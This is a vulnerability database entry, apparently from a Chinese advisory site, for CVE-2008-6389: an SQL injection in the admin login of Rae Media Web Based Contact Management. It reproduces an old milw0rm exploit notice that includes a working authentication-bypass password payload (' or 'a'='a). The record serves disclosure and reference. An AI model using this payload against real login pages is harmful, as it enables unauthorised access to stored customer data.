https://www.exploit-db.com/exploits/7333
https://cxsecurity.com/issue/WLB-2009030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-043
Aliensoftcorp Rae Media Web Based Contact Management 'asadmin/default.asp' SQL注入漏洞






漏洞ID | 1116920 | 漏洞类型 | SQL注入 |
发布时间 | 2008-12-03 | 更新时间 | 2009-03-03 |
![]() |
CVE-2008-6389 | ![]() |
CNNVD-200903-043 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
RaeMediaContactManagement是一个基于ASP和SQLServer的客户联系管理系统。RaeMediaContactManagementSoftware小型家庭版,标准版,以及企业版的asadmin/default.asp中存在SQL注入漏洞。远程攻击者可以借助密码参数,执行任意SQL指令。
|漏洞EXP
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 03 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR : http://www.aliensoftcorp.com/
DEMO : http://www.aliensoftcorp.com/contactmanager.htm
#####################################################
[+] vuln :
Admin login page
All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
All Demo links are here:
http://www.aliensoftcorp.com/contactmanager.htm
[+] Exploit :
USER: anything
PASS: delta' or 'a'='a
##########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
##########################################################################################################
# milw0rm.com [2008-12-03]
|参考资料
来源:BID
名称:32616
链接:http://www.securityfocus.com/bid/32616
来源:MILW0RM
名称:7333
链接:http://www.milw0rm.com/exploits/7333
来源:SECUNIA
名称:32988
链接:http://secunia.com/advisories/32988
检索漏洞
开始时间
结束时间